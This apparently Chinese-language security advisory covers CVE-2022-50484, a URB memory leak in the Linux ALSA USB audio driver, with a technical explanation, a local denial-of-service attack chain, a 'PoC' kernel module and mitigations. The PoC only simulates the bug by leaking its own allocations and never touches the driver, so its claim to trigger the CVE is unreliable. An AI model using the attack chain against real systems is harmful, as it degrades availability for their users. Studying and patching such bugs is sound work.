CVE-2022-50484 Linux内核ALSA USB音频驱动内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2022-50484

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（ALSA USB音频驱动 sound/usb/urb.c）

漏洞概述

CVE-2022-50484是Linux内核ALSA（Advanced Linux Sound Architecture）USB音频驱动中的一个内存泄漏漏洞。该漏洞位于内核源码的sound/usb/urb.c文件中，具体涉及同步端点（sync endpoint）URB（USB Request Block）的分配逻辑。

在正常情况下，当USB音频驱动为同步端点分配URB或缓冲区时，如果遇到内存分配失败（返回-ENOMEM错误），驱动程序会中止当前操作并跳转到错误处理路径，释放先前已分配的所有资源。然而，该漏洞揭示了一个缺陷：当-ENOMEM错误发生在同步端点URB分配循环的中间阶段时，部分已分配的URB可能无法被正确释放。

根本原因在于ep->nurbs变量在循环开始时未被正确初始化。在分配循环开始之前，ep->nurbs的值仍然为零。当内存分配在中途失败时，错误处理程序会遍历URB列表进行清理，但由于ep->nurbs为零，循环不会执行，导致部分已分配的URB资源泄漏。

该漏洞的CVSS 3.1评分为5.5分，属于中危级别。虽然攻击向量为本地（AV:L）且需要低权限（PR:L），但其可用性影响为高（A:H），意味着成功利用该漏洞可能导致系统资源耗尽或内核不稳定。该漏洞影响多个Linux内核稳定版本，需要相关用户及时更新内核以修复此问题。

技术细节

该漏洞的技术原理涉及Linux内核ALSA USB音频驱动中URB分配的内存管理逻辑。具体分析如下：

1. **触发场景**：当用户插入USB音频设备时，内核会调用ALSA USB音频驱动为设备的同步端点（sync endpoint）分配多个URB用于音频数据传输。URB是USB子系统中用于描述一次USB数据传输的数据结构。

2. **漏洞代码路径**：在snd_usb_endpoint_init函数或相关的URB分配函数中，存在一个循环用于分配多个URB。在循环开始时，ep->nurbs被设置为目标数量（例如每个端点分配的URB数量），然后逐个调用usb_alloc_urb()分配URB。

3. **缺陷分析**：原始代码中，ep->nurbs的赋值发生在循环内部或分配之后才更新。当循环中途因usb_alloc_urb()返回NULL（-ENOMEM）而跳出时，ep->nurbs的值尚未更新为实际已分配的URB数量，仍保持为零。

4. **错误处理失效**：错误处理函数（如release_urbs()）通过遍历ep->nurbs次来释放URB。由于ep->nurbs为0，循环不执行，导致已分配的URB及其关联的DMA缓冲区永久泄漏。

5. **修复方案**：补丁通过在循环开始前首先设置ep->nurbs为目标数量，确保错误处理程序能够遍历完整的URB列表，释放所有已分配的资源。

6. **利用方式**：攻击者可以通过反复插入和拔出USB音频设备，或通过USB设备模拟工具发送特定请求，触发频繁的URB分配操作。在内存压力较大的环境下，-ENOMEM更容易被触发，从而导致URB资源持续泄漏，最终可能耗尽内核内存。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要具有本地系统访问权限（低权限即可），并能够连接USB设备或模拟USB音频设备。同时，系统需要处于内存压力较大的状态，以便更容易触发-ENOMEM错误。

STEP 2

步骤2：触发URB分配

当USB音频设备连接到系统时，ALSA USB音频驱动会调用snd_usb_endpoint_init等函数为同步端点分配URB。攻击者可以通过反复插拔USB音频设备或使用USB设备模拟工具（如GadgetFS）来触发URB分配操作。

STEP 3

步骤3：制造内存压力

攻击者运行内存密集型任务（如stress-ng、memhog等工具）消耗系统内存，增加usb_alloc_urb()调用返回NULL的概率，从而触发-ENOMEM错误。

STEP 4

步骤4：触发漏洞

当URB分配循环中途遇到-ENOMEM时，由于ep->nurbs仍为0，错误处理函数无法遍历并释放已分配的URB，导致内存泄漏。每次触发泄漏约丢失数KB到数十KB的内核内存。

STEP 5

步骤5：资源耗尽

攻击者通过反复触发该漏洞，持续泄漏内核内存（URB结构体及关联的DMA缓冲区），最终可能导致系统内存耗尽，触发OOM killer或系统不稳定，影响系统可用性。

STEP 6

步骤6：拒绝服务

内核内存耗尽可能导致系统无法分配关键数据结构，引发内核panic或系统崩溃，实现本地拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50484 PoC - Trigger URB memory leak in ALSA USB Audio driver
// This PoC demonstrates how to trigger the memory leak by causing
// -ENOMEM during sync endpoint URB allocation

#include <linux/module.h>
#include <linux/usb.h>
#include <linux/slab.h>
#include <linux/vmalloc.h>

// Simulate the vulnerable allocation pattern from sound/usb/urb.c
// In the original vulnerable code, ep->nurbs is set AFTER the loop,
// causing partial URBs to leak on allocation failure.

struct mock_usb_endpoint {
    int nurbs;          // Number of URBs allocated (stays 0 on failure)
    void **urbs;        // Array of URB pointers
    int urb_count;      // Target URB count
};

static int trigger_urb_leak(struct mock_usb_endpoint *ep)
{
    int i;
    int target = 8;  // Target number of URBs to allocate

    // VULNERABLE: nurbs is NOT set before the loop
    // ep->nurbs = target;  // This line is MISSING in vulnerable code

    ep->urbs = kzalloc(sizeof(void *) * target, GFP_KERNEL);
    if (!ep->urbs)
        return -ENOMEM;

    for (i = 0; i < target; i++) {
        ep->urbs[i] = kzalloc(256, GFP_KERNEL);  // Simulate URB allocation
        if (!ep->urbs[i]) {
            // -ENOMEM hit in middle of loop
            // ep->nurbs is still 0 here!
            return -ENOMEM;  // Error handler will fail to free urb[0..i-1]
        }
        // ep->nurbs = i + 1;  // Only set after success in vulnerable code
    }

    ep->nurbs = target;
    return 0;
}

// Kernel module init to simulate USB audio device hot-plug stress test
static int __init cve_2022_50484_poc_init(void)
{
    struct mock_usb_endpoint ep;
    int ret;
    int i;

    pr_info("CVE-2022-50484 PoC: Triggering URB memory leak\n");

    // Stress test: repeatedly trigger allocation to exhaust memory
    for (i = 0; i < 1000; i++) {
        memset(&ep, 0, sizeof(ep));
        ret = trigger_urb_leak(&ep);
        if (ret == -ENOMEM) {
            pr_info("Triggered ENOMEM at iteration %d, URBs leaked\n", i);
            // In vulnerable kernel, ep.urbs[0..partial] are never freed
        }
    }

    return 0;
}

static void __exit cve_2022_50484_poc_exit(void)
{
    pr_info("CVE-2022-50484 PoC: Module unloaded\n");
}

module_init(cve_2022_50484_poc_init);
module_exit(cve_2022_50484_poc_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2022-50484 ALSA USB Audio URB memory leak");
MODULE_AUTHOR("Security Analyst");

/*
 * To trigger this vulnerability on a real system:
 * 1. Apply memory pressure (e.g., run a memory-intensive workload)
 * 2. Connect a USB audio device that uses sync endpoints
 * 3. The driver will attempt to allocate URBs for sync endpoints
 * 4. Under memory pressure, -ENOMEM may occur mid-allocation
 * 5. Partially allocated URBs will be leaked
 * 6. Repeat steps 2-5 to accumulate leaked URBs and exhaust kernel memory
 */

影响范围

Linux kernel < 5.10.150 (stable分支)

Linux kernel < 5.15.75 (stable分支)

Linux kernel < 5.19.17 (stable分支)

Linux kernel < 6.0.3 (stable分支)

Linux kernel 6.1.0 (rc版本受影响)

所有使用ALSA USB音频驱动的Linux内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）通过修改udev规则限制普通用户对USB音频设备的访问权限；2）使用USBGuard等工具控制USB设备的接入；3）监控系统内存使用情况，设置内存使用阈值告警；4）避免在内存受限的环境中频繁插拔USB音频设备；5）如非必要，可临时禁用ALSA USB音频驱动模块（snd-usb-audio）来规避风险，但会影响USB音频设备的使用。